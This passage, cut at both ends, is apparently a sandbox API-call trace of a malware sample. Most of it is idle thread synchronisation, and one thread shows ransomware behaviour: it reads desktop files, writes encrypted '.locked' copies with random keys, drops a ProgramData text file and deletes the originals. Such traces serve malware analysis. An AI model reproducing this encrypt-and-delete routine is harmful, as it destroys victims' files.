Alertable=0, Time=0x3244fedc) returned 0x102 [0318.927] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.930] SetEvent (hEvent=0x14c) returned 1 [0318.930] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.934] SetEvent (hEvent=0x14c) returned 1 [0318.934] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.937] SetEvent (hEvent=0x14c) returned 1 [0318.937] SetEvent (hEvent=0x190) returned 1 [0318.937] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.960] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.997] SetEvent (hEvent=0x190) returned 1 [0318.997] SetEvent (hEvent=0x14c) returned 1 [0318.997] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0319.000] SetEvent (hEvent=0x14c) returned 1 [0319.000] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0319.149] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0319.232] SetEvent (hEvent=0x14c) returned 1 [0319.232] SetEvent (hEvent=0x190) returned 1 [0319.232] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0319.248] SetEvent (hEvent=0x190) returned 1 [0319.248] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0319.255] SetEvent (hEvent=0x190) returned 1 [0319.255] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0319.420] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0319.474] SetEvent (hEvent=0x190) returned 1 [0319.474] SetEvent (hEvent=0x220) returned 1 [0319.474] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0319.479] SetEvent (hEvent=0x220) returned 1 [0319.479] SetEvent (hEvent=0x190) returned 1 [0319.479] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0319.627] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0319.698] timeEndPeriod (uPeriod=0x1) returned 0x0 [0319.698] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0319.702] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0319.702] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0319.854] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0319.857] timeEndPeriod (uPeriod=0x1) returned 0x0 [0319.857] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0319.859] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0319.859] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0319.876] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0319.878] SetEvent (hEvent=0x198) returned 1 [0319.878] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0319.884] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0319.885] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0319.886] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0319.888] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0319.889] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0319.890] timeEndPeriod (uPeriod=0x1) returned 0x0 [0319.890] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0320.119] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0320.119] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0320.121] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0320.170] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0320.205] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0320.207] timeEndPeriod (uPeriod=0x1) returned 0x0 [0320.207] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0320.210] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0320.210] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0320.212] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0320.340] timeEndPeriod (uPeriod=0x1) returned 0x0 [0320.340] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0320.362] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0320.362] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0320.364] timeEndPeriod (uPeriod=0x1) returned 0x0 [0320.364] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0320.372] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0320.372] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0320.394] timeEndPeriod (uPeriod=0x1) returned 0x0 [0320.394] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0320.403] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0320.403] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0320.406] timeEndPeriod (uPeriod=0x1) returned 0x0 [0320.406] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0320.432] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0320.432] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0320.436] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0320.438] timeEndPeriod (uPeriod=0x1) returned 0x0 [0320.439] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0320.463] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0320.463] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0320.486] timeEndPeriod (uPeriod=0x1) returned 0x0 [0320.486] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0320.494] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0320.495] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0320.496] timeEndPeriod (uPeriod=0x1) returned 0x0 [0320.496] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0320.498] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0320.498] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0320.502] timeEndPeriod (uPeriod=0x1) returned 0x0 [0320.502] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0320.507] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0320.507] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0320.511] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0320.512] timeEndPeriod (uPeriod=0x1) returned 0x0 [0320.512] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0320.540] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0320.540] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0320.574] timeEndPeriod (uPeriod=0x1) returned 0x0 [0320.574] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0320.615] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0320.616] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0320.624] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0320.638] timeEndPeriod (uPeriod=0x1) returned 0x0 [0320.638] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0320.650] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0320.650] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0320.702] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0320.711] timeEndPeriod (uPeriod=0x1) returned 0x0 [0320.711] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0320.716] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0320.716] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0320.722] timeEndPeriod (uPeriod=0x1) returned 0x0 [0320.722] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0320.733] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0320.733] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0320.835] timeEndPeriod (uPeriod=0x1) returned 0x0 [0320.835] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0320.840] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0320.841] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0320.863] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0320.895] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0320.904] timeEndPeriod (uPeriod=0x1) returned 0x0 [0320.904] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0320.941] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0320.941] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0320.945] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0320.948] timeEndPeriod (uPeriod=0x1) returned 0x0 [0320.948] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0320.950] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0320.953] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0320.993] timeEndPeriod (uPeriod=0x1) returned 0x0 [0320.993] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0320.999] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0320.999] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.004] timeEndPeriod (uPeriod=0x1) returned 0x0 [0321.004] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0321.042] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0321.042] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.078] SetEvent (hEvent=0x184) returned 1 [0321.078] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.089] SetEvent (hEvent=0x180) returned 1 [0321.090] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.115] SetEvent (hEvent=0x180) returned 1 [0321.115] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.117] SetEvent (hEvent=0x180) returned 1 [0321.117] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.123] SetEvent (hEvent=0x180) returned 1 [0321.123] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.126] SetEvent (hEvent=0x180) returned 1 [0321.126] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.128] SetEvent (hEvent=0x180) returned 1 [0321.128] SetEvent (hEvent=0x220) returned 1 [0321.128] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.189] timeEndPeriod (uPeriod=0x1) returned 0x0 [0321.189] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0321.203] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0321.204] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.207] timeEndPeriod (uPeriod=0x1) returned 0x0 [0321.207] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0321.210] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0321.210] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.226] timeEndPeriod (uPeriod=0x1) returned 0x0 [0321.226] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0321.242] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0321.242] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.245] timeEndPeriod (uPeriod=0x1) returned 0x0 [0321.245] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0321.246] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0321.246] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.249] timeEndPeriod (uPeriod=0x1) returned 0x0 [0321.249] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0321.250] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0321.250] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.319] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.325] timeEndPeriod (uPeriod=0x1) returned 0x0 [0321.325] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0321.345] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0321.345] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.371] timeEndPeriod (uPeriod=0x1) returned 0x0 [0321.372] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0321.380] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0321.380] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.393] timeEndPeriod (uPeriod=0x1) returned 0x0 [0321.393] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0321.398] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0321.398] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.446] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.454] timeEndPeriod (uPeriod=0x1) returned 0x0 [0321.454] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0321.455] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0321.455] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.512] timeEndPeriod (uPeriod=0x1) returned 0x0 [0321.512] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0321.519] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0321.519] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.550] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.552] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.567] timeEndPeriod (uPeriod=0x1) returned 0x0 [0321.567] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0321.570] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0321.571] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.572] timeEndPeriod (uPeriod=0x1) returned 0x0 [0321.573] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0321.586] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0321.586] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.589] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.592] timeEndPeriod (uPeriod=0x1) returned 0x0 [0321.592] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0321.638] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0321.638] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.643] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.657] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.658] timeEndPeriod (uPeriod=0x1) returned 0x0 [0321.658] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0321.680] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0321.682] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.685] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.687] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.707] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.724] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.808] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0321.809] timeEndPeriod (uPeriod=0x1) returned 0x0 [0321.809] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) Thread: id = 8 os_tid = 0x1234 [0122.914] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3254ff58, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3254ff58*=0x10c) returned 1 [0122.914] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x100000, lpStartAddress=0x44bd00, lpParameter=0x1237a000, dwCreationFlags=0x10000, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x110 [0122.914] CloseHandle (hObject=0x110) returned 1 [0122.914] SetEvent (hEvent=0x104) returned 1 [0122.929] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x12c [0122.929] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0256.814] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0256.818] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0256.818] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0256.819] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0256.822] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0256.950] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0257.854] SetEvent (hEvent=0x134) returned 1 [0257.855] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0257.989] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0258.213] SetEvent (hEvent=0x134) returned 1 [0258.213] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0258.274] SetEvent (hEvent=0x134) returned 1 [0258.274] SetEvent (hEvent=0x104) returned 1 [0258.274] SwitchToThread () returned 1 [0258.323] SetEvent (hEvent=0x134) returned 1 [0258.323] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0258.383] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0258.888] SetEvent (hEvent=0x14c) returned 1 [0258.888] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0258.942] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0259.038] SetEvent (hEvent=0x134) returned 1 [0259.038] ReadFile (in: hFile=0x184, lpBuffer=0x13134000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1276ed68, lpOverlapped=0x0 | out: lpBuffer=0x13134000*, lpNumberOfBytesRead=0x1276ed68*=0x16d43, lpOverlapped=0x0) returned 1 [0259.041] WriteFile (in: hFile=0x188, lpBuffer=0x13134000*, nNumberOfBytesToWrite=0x16d43, lpNumberOfBytesWritten=0x1276ed74, lpOverlapped=0x0 | out: lpBuffer=0x13134000*, lpNumberOfBytesWritten=0x1276ed74*=0x16d43, lpOverlapped=0x0) returned 1 [0259.093] ReadFile (in: hFile=0x184, lpBuffer=0x13134000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1276ed68, lpOverlapped=0x0 | out: lpBuffer=0x13134000*, lpNumberOfBytesRead=0x1276ed68*=0x0, lpOverlapped=0x0) returned 1 [0259.093] CloseHandle (hObject=0x188) returned 1 [0259.096] CloseHandle (hObject=0x184) returned 1 [0259.096] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0259.097] GetConsoleMode (in: hConsoleHandle=0x184, lpMode=0x1276ee94 | out: lpMode=0x1276ee94) returned 0 [0259.097] WriteFile (in: hFile=0x184, lpBuffer=0x1264a0c0*, nNumberOfBytesToWrite=0x39, lpNumberOfBytesWritten=0x1276ee64, lpOverlapped=0x0 | out: lpBuffer=0x1264a0c0*, lpNumberOfBytesWritten=0x1276ee64*=0x39, lpOverlapped=0x0) returned 1 [0259.102] CloseHandle (hObject=0x184) returned 1 [0259.104] GetProcAddress (hModule=0x75600000, lpProcName="DeleteFileW") returned 0x756268c0 [0259.104] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\EMZ6NoSJq0-2xx6IW.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\emz6nosjq0-2xx6iw.wav")) returned 1 [0259.151] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0260.420] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c240*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1263ba24, lpReserved=0x0 | out: lpBuffer=0x1234c240*, lpNumberOfCharsWritten=0x1263ba24*=0xa) returned 1 [0260.437] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\DWVUXEoQZyD.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\dwvuxeoqzyd.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0260.437] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x1263bd9c | out: lpMode=0x1263bd9c) returned 0 [0260.465] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\DWVUXEoQZyD.flv.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\dwvuxeoqzyd.flv.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0260.851] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0260.856] SetEvent (hEvent=0x1f0) returned 1 [0260.856] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x1263bd9c | out: lpMode=0x1263bd9c) returned 0 [0260.856] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0260.972] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0x1) returned 0x102 [0261.036] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0261.036] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3254fb30, ulCount=0x10, ulNumEntriesRemoved=0x3254fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3254fb30, ulNumEntriesRemoved=0x3254fb10) returned 0 [0261.036] SetEvent (hEvent=0x150) returned 1 [0261.036] SetEvent (hEvent=0x1dc) returned 1 [0261.036] SetEvent (hEvent=0x134) returned 1 [0261.037] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0x1) returned 0x102 [0261.044] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0261.044] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0x1) returned 0x0 [0261.047] SetEvent (hEvent=0x1dc) returned 1 [0261.047] SetEvent (hEvent=0x1e8) returned 1 [0261.047] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0261.049] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3254fb34, ulCount=0x10, ulNumEntriesRemoved=0x3254fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3254fb34, ulNumEntriesRemoved=0x3254fb14) returned 0 [0261.049] SetEvent (hEvent=0x150) returned 1 [0261.049] SetEvent (hEvent=0x1e8) returned 1 [0261.050] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x100000, lpStartAddress=0x44bd00, lpParameter=0x1266a240, dwCreationFlags=0x10000, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x204 [0261.050] CloseHandle (hObject=0x204) returned 1 [0261.050] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc000 | out: pbBuffer=0x125fc000) returned 1 [0261.050] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8010 | out: pbBuffer=0x124a8010) returned 1 [0261.050] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714181 | out: pbBuffer=0x12714181) returned 1 [0261.051] WriteFile (in: hFile=0x200, lpBuffer=0x124a7000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125f3d78, lpOverlapped=0x0 | out: lpBuffer=0x124a7000*, lpNumberOfBytesWritten=0x125f3d78*=0x80, lpOverlapped=0x0) returned 1 [0261.055] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0x1) returned 0x0 [0261.057] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3254fb30, ulCount=0x10, ulNumEntriesRemoved=0x3254fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3254fb30, ulNumEntriesRemoved=0x3254fb10) returned 0 [0261.057] SetEvent (hEvent=0x1e8) returned 1 [0261.057] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x100000, lpStartAddress=0x44bd00, lpParameter=0x1266a480, dwCreationFlags=0x10000, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x210 [0261.058] CloseHandle (hObject=0x210) returned 1 [0261.058] ReadFile (in: hFile=0x19c, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125f3d68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x125f3d68*=0x859e, lpOverlapped=0x0) returned 1 [0261.061] WriteFile (in: hFile=0x200, lpBuffer=0x12770000*, nNumberOfBytesToWrite=0x859e, lpNumberOfBytesWritten=0x125f3d74, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesWritten=0x125f3d74*=0x859e, lpOverlapped=0x0) returned 1 [0261.256] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0261.758] ReadFile (in: hFile=0x19c, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125f3d68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x125f3d68*=0x0, lpOverlapped=0x0) returned 1 [0261.758] CloseHandle (hObject=0x200) returned 1 [0261.817] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0262.102] CloseHandle (hObject=0x19c) returned 1 [0262.102] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0263.001] SetEvent (hEvent=0x134) 